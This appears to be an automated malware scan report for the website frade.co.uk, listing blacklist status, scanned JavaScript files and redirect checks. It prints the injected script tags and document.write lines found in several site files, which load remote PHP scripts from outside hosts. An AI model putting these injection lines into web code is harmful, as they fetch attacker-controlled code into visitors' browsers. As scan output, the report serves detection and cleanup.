Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=frade.co.uk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.frade.co.uk/ | 200 OK Content-Length: 4446 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://clock-phone.ru/NGL3Ty4b.php?id=69860507"></script> | ||
http://www.frade.co.uk/js/modernizr.custom.25376.js | 200 OK Content-Length: 9377 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;window.Modernizr=function(a,b,c){function z(a){j.cssText=a}function A(a,b){return z(m.join(a+";")+(b||""))}function B(a,b){return typeof a===b}function C(a,b){return!!~(""+a).indexOf(b)}function D(a,b){for(var d in a){var e=a[d];if(!C(e,"-")&&j[e]!==c)return b=="pfx"?e:!0}return!1}function E(a,b,d){for(var e in a){var f=b[a[e]];if(f!==c)return d===!1?a[e]:B(f,"function")?f.bind(d||b):f}return!1}function F(a,b,c){var d=a.charAt(0).toUpperCase()+a.slice(1),e=(a+" "+o.join(d+" ")+d).split( Antivirus reports:
| ||
http://www.frade.co.uk/js/jquery.js | 200 OK Content-Length: 93207 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://ftp.leticiazarza.com/blog/xhlvnnbc.php?id=69860511"></script>');
| ||
http://www.frade.co.uk/js/classie.js | 200 OK Content-Length: 1985 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://ftp.leticiazarza.com/blog/xhlvnnbc.php?id=69860508"></script>');
| ||
http://www.frade.co.uk/js/menu.js | 200 OK Content-Length: 4836 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://ftp.leticiazarza.com/blog/xhlvnnbc.php?id=69860512"></script>');
| ||
http://www.frade.co.uk/js/countdown.js | 404 Not Found Content-Length: 21 Content-Type: text/html | clean |
http://www.frade.co.uk/test404page.js | 404 Not Found Content-Length: 21 Content-Type: text/html | clean |
http://www.frade.co.uk/js/effects.core.js | 200 OK Content-Length: 19320 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://ftp.leticiazarza.com/blog/xhlvnnbc.php?id=69860509"></script>');
| ||
http://www.frade.co.uk/js/effects.slide.js | 200 OK Content-Length: 1744 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://ftp.leticiazarza.com/blog/xhlvnnbc.php?id=69860510"></script>');
| ||
http://www.frade.co.uk/js/supersized.3.0.js | 200 OK Content-Length: 14680 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://ftp.leticiazarza.com/blog/xhlvnnbc.php?id=69860514"></script>');
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: frade.co.uk
Result:
GET / HTTP/1.1
Host: frade.co.uk
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: frade.co.uk
Referer: http://www.google.com/search?q=frade.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: frade.co.uk
Referer: http://www.google.com/search?q=frade.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.